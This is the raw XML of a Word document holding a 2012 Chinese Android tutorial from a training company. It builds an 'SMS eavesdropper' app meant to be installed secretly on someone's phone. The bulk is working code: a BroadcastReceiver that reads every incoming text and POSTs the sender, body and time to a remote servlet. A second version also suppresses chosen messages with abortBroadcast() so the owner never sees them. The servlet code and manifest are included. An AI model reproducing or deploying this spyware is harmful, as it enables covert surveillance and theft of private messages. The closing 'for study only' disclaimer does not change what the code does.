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A4" w:rsidRPr="000E07A4" w:rsidRDefault="000E07A4" w:rsidP="000E07A4">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Simsun" w:eastAsia="宋体" w:hAnsi="Simsun" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="3C3C3C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000E07A4">
        <w:rPr>
          <w:rFonts w:ascii="Simsun" w:eastAsia="宋体" w:hAnsi="Simsun" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="3C3C3C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>Android</w:t>
      </w:r>
      <w:r w:rsidRPr="000E07A4">
        <w:rPr>
          <w:rFonts w:ascii="Simsun" w:eastAsia="宋体" w:hAnsi="Simsun" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="3C3C3C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>入门：广播接收者应用（短信切挺器）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000E07A4" w:rsidRPr="000E07A4" w:rsidRDefault="000E07A4" w:rsidP="000E07A4">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Simsun" w:eastAsia="宋体" w:hAnsi="Simsun" w:cs="宋体"/>
          <w:color w:val="999999"/>
          <w:kern w:val="0"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000E07A4">
        <w:rPr>
          <w:rFonts w:ascii="Simsun" w:eastAsia="宋体" w:hAnsi="Simsun" w:cs="宋体"/>
          <w:color w:val="999999"/>
          <w:kern w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>作者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: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未知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 xml:space="preserve"> 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更新时间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 xml:space="preserve">:2012-7-24 10:20:24 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来源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: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宁波达内科技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 xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="000E07A4">
        <w:rPr>
          <w:rFonts w:ascii="Simsun" w:eastAsia="宋体" w:hAnsi="Simsun" w:cs="宋体"/>
          <w:color w:val="999999"/>
          <w:kern w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>网址：</w:t>
      </w:r>
      <w:hyperlink r:id="rId6" w:history="1">
        <w:r w:rsidRPr="000E07A4">
          <w:rPr>
            <w:rFonts w:ascii="Simsun" w:eastAsia="宋体" w:hAnsi="Simsun" w:cs="宋体"/>
            <w:color w:val="3C3C3C"/>
            <w:kern w:val="0"/>
            <w:sz w:val="14"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>www.nbtarena.com</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="000E07A4" w:rsidRPr="000E07A4" w:rsidRDefault="000E07A4" w:rsidP="000E07A4">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:line="269" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Simsun" w:eastAsia="宋体" w:hAnsi="Simsun" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="363737"/>
          <w:kern w:val="36"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000E07A4">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="363737"/>
          <w:kern w:val="36"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>Android</w:t>
      </w:r>
      <w:r w:rsidRPr="000E07A4">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="363737"/>
          <w:kern w:val="36"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>入门：广播接收者应用（短信切挺器）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0E07A4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【</w:t>
      </w:r>
      <w:hyperlink r:id="rId7" w:history="1">
        <w:r w:rsidRPr="000E07A4">
          <w:rPr>
            <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体" w:hint="eastAsia"/>
            <w:b/>
            <w:bCs/>
            <w:color w:val="3C3C3C"/>
            <w:kern w:val="0"/>
            <w:sz w:val="14"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>宁波达内</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="000E07A4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】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一、短信切挺器原理介绍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短信切挺器的目的是窃听某人发送的短信，比如我们在A的手机中安装了此应用想要看B发送给A的短信；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而怎么样才能够获得短信息呢？如果通过短信方式发送给第三方，则会被看出来，因此我们可以通过网络将消息发送给web服务器；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Android手机中的Messaging应用也只是一个普通的应用；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二、核心代*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短信切挺器客户端核心代*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在AndroidManifest.xml中添加权限：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[html]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android:name="android.permission.RECEIVE_SMS"/&gt;&lt;!-- 接收短信权限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android:name="android.permission.INTERNET"/&gt;&lt;!-- 网络访问权限 --&gt;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(1)Object[] pdus = (Object[])intent.getExtras().get("pdus");获得短信数据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(2)byte[] pdu = (byte[])pdus[0];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(3)SmsMessage message  = SmsMessage.createFromPdu(pdu);将字节数组封装为SmsMessage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(4)String content = message.getMessageBody();获得短信内容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(5)String date = new Date(message.getTimestampMillis()).toLocaleString();获得短信时间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(6)String senderNumber = message.getOriginatingAddress();获得发送方号*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服务器端代*只是接收参数并显示；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三、短信切挺器具体代*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服务器端代*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[java]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package org.xiazdong.servlet;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java.io.IOException;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javax.servlet.ServletException;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javax.servlet.annotation.WebServlet;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javax.servlet.http.HttpServlet;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javax.servlet.http.HttpServletRequest;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javax.servlet.http.HttpServletResponse;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@WebServlet("/SMSServlet")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public class SMSServlet extends HttpServlet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protected void doGet(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException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doPost(request, response);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 xml:space="preserve">    protected void doPost(HttpServletRequest request, HttpServletResponse response) throws ServletException, </w:t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IOException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request.setCharacterEncoding("utf-8");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String sender = request.getParameter("sender");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String body = request.getParameter("body");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String time = request.getParameter("time");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System.out.println("发送方："+sender);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System.out.println("发送内容："+body);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System.out.println("发送时间："+time);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}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1.只是获得短信息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场景介绍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384165" cy="3773805"/>
            <wp:effectExtent l="19050" t="0" r="6985" b="0"/>
            <wp:docPr id="1" name="图片 1" descr="http://my.csdn.net/uploads/201207/21/1342824074_68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21/1342824074_687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效果说明：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3105150" cy="586740"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="2" name="图片 2" descr="http://my.csdn.net/uploads/201207/21/1342824483_2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21/1342824483_206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[java]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package com.xiazdong.smslistener;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java.io.OutputStream;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import java.net.HttpURLConnection;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java.net.URL;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java.net.URLEncoder;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java.util.Date;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android.content.Broadca*stReceiver;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android.content.Context;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android.content.Intent;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android.telephony.SmsMessage;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android.util.Log;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public class SMSBroadca*stReceiver extends Broadca*stReceiver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@Override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public void onReceive(Context context, Intent intent)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Object[] pdus = (Object[])intent.getExtras().get("pdus");   //接收数据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for(Object p: pdus){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byte[]pdu = (byte[])p;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SmsMessage message = SmsMessage.createFromPdu(pdu); //根据获得的byte[]封装成SmsMessage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body = message.getMessageBody();             //发送内容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date = new Date(message.getTimestampMillis()).toLocaleString();//发送时间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sender = message.getOriginatingAddress();    //短信发送方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try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sendSMS(sender,body,date);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} catch (Exception e)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e.printStackTrace();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 &lt;/span&gt;if("5554".equals(sender)){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     &lt;/span&gt;try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         &lt;/span&gt;sendSMS(sender,body,date);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     &lt;/span&gt;} catch (Exception e)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         &lt;/span&gt;e.printStackTrace();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     &lt;/span&gt;}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&lt;span style="white-space:pre"&gt;          &lt;/span&gt;}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private void sendSMS(String sender, String body, String date) throws Exception{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String params = "sender="+URLEncoder.encode(sender)+"&amp;body="+URLEncoder.encode(body)+"&amp;time="+URLEncoder.encode(date);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byte[]bytes = params.getBytes("UTF-8");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URL url = new URL("http://192.168.0.103:8080/Server/SMSServlet");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HttpURLConnection conn = (HttpURLConnection)url.openConnection();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conn.setRequestMethod("POST");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        conn.setRequestProperty("Content-Type", "application/x-www-form-urlencoded");   //设置HTTP请求头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conn.setRequestProperty("Content-Length", bytes.length+"");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conn.setDoOutput(true);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OutputStream out = conn.getOutputStream();  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out.write(bytes);   //设置HTTP请求体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if(conn.getResponseCode()==200){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Log.i("TAG", "发送成功");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}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AndroidManifest.xml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[html]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android:name="android.permission.RECEIVE_SMS"/&gt;&lt;!-- 接收短信权限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android:name="android.permission.INTERNET"/&gt;&lt;!-- 网络访问权限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&lt;application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 android:icon="@drawable/ic_launcher"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 android:label="@string/app_name" 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 &lt;receiver android:name=".SMSBroadca*stReceiver"&gt;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 &lt;intent-filter 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&lt;action android:name="android.provider.Telephony.SMS_RECEIVED"/&gt;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 &lt;/intent-filter&gt;  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 &lt;/receiver&gt;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&lt;/application&gt;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2.屏蔽短信并发送给第三方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场景说明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 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体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6011545" cy="4435475"/>
            <wp:effectExtent l="19050" t="0" r="8255" b="0"/>
            <wp:docPr id="3" name="图片 3" descr="http://my.csdn.net/uploads/201207/21/1342824064_44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21/1342824064_441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客户端代*：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[java]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package com.xiazdong.smslistener;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java.io.OutputStream;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java.net.HttpURLConnection;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java.net.URL;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java.net.URLEncoder;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java.util.Date;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android.content.Broadca*stReceiver;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android.content.Context;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android.content.Intent;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android.telephony.SmsMessage;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import android.util.Log;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public class SMSBroadca*stReceiver extends Broadca*stReceiver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@Override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public void onReceive(Context context, Intent intent)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        Object[] pdus = (Object[])intent.getExtras().get("pdus");   //接收数据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for(Object p: pdus){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byte[]pdu = (byte[])p;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SmsMessage message = SmsMessage.createFromPdu(pdu); //根据获得的byte[]封装成SmsMessage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body = message.getMessageBody();             //发送内容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date = new Date(message.getTimestampMillis()).toLocaleString();//发送时间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String sender = message.getOriginatingAddress();    //短信发送方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if("15555215556".equals(sender)){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try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     sendSMS(sender,body,date);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} catch (Exception e) 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     e.printStackTrace();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  abortBroadca*st();   //中断广播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private void sendSMS(String sender, String body, String date) throws Exception{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String params = "sender="+URLEncoder.encode(sender)+"&amp;body="+URLEncoder.encode(body)+"&amp;time="+URLEncoder.encode(date);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byte[]bytes = params.getBytes("UTF-8");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URL url = new URL("http://192.168.0.103:8080/Server/SMSServlet");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HttpURLConnection conn = (HttpURLConnection)url.openConnection();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conn.setRequestMethod("POST");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conn.setRequestProperty("Content-Type", "application/x-www-form-urlencoded");   //设置HTTP请求头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conn.setRequestProperty("Content-Length", bytes.length+"");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conn.setDoOutput(true);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OutputStream out = conn.getOutputStream();  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out.write(bytes);   //设置HTTP请求体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if(conn.getResponseCode()==200){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 Log.i("TAG", "发送成功");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 }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}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AndroidManifest.xml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[html]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android:name="android.permission.RECEIVE_SMS"/&gt;&lt;!-- 接收短信权限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&lt;uses-permission android:name="android.permission.INTERNET"/&gt;&lt;!-- 网络访问权限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 &lt;application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 android:icon="@drawable/ic_launcher"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lastRenderedPageBreak/>
        <w:t>       android:label="@string/app_name" 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 &lt;receiver android:name=".SMSBroadca*stReceiver"&gt;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 &lt;intent-filter android:priority="1000"&gt;    &lt;!-- 优先级设为1000，最高 --&gt;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   &lt;action android:name="android.provider.Telephony.SMS_RECEIVED"/&gt;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 &lt;/intent-filter&gt;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     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     &lt;/receiver&gt; </w:t>
      </w:r>
      <w:r w:rsidRPr="000E07A4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   &lt;/application&gt; </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000E07A4" w:rsidRPr="000E07A4" w:rsidRDefault="000E07A4" w:rsidP="000E07A4">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="301" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000E07A4">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>以上内容由宁波达内分享，仅供学习研究之用，不得用做它途，本文内容仅是学习分享，涉及敏感方面宁波达内不予承担。</w:t>
      </w:r>
      <w:hyperlink r:id="rId11" w:history="1">
        <w:r w:rsidRPr="000E07A4">
          <w:rPr>
            <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
            <w:color w:val="3C3C3C"/>
            <w:kern w:val="0"/>
            <w:sz w:val="14"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>www.nbtarena.com</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="000E07A4" w:rsidRPr="000E07A4" w:rsidRDefault="000E07A4" w:rsidP="000E07A4">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:line="269" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Simsun" w:eastAsia="宋体" w:hAnsi="Simsun" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="3C3C3C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009962CE" w:rsidRDefault="009962CE"/>
    <w:sectPr w:rsidR="0099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2CE" w:rsidRDefault="009962CE" w:rsidP="000E07A4">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="1">
    <w:p w:rsidR="009962CE" w:rsidRDefault="009962CE" w:rsidP="000E0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2CE" w:rsidRDefault="009962CE" w:rsidP="000E07A4">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="1">
    <w:p w:rsidR="009962CE" w:rsidRDefault="009962CE" w:rsidP="000E0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7A4"/>
    <w:rsid w:val="000E07A4"/>
    <w:rsid w:val="0099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7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7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7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0E07A4"/>
  </w:style>
  <w:style w:type="character" w:styleId="a5">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="000E07A4"/>
    <w:rPr>
      <w:color w:val="0000FF"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="a6">
    <w:name w:val="Strong"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="22"/>
    <w:qFormat/>
    <w:rsid w:val="000E07A4"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a7">
    <w:name w:val="Normal (Web)"/>
    <w:basedOn w:val="a"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="000E0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E07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E07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021">
          <w:marLeft w:val="0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986">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="161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134">
          <w:marLeft w:val="215"/>
          <w:marRight w:val="215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btaren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btarena.com/" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.nbtarena.com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1173</Words>
  <Characters>6691</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>55</Lines>
  <Paragraphs>15</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company>http://www.deepbbs.org</Company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2014-01-06T09:16:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2014-01-06T09:16:00Z</dcterms:modified>
</cp:coreProperties>
</file>